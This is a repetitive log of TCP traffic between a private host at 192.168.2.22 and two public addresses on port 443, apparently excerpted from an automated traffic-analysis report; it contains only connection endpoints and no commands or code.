Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
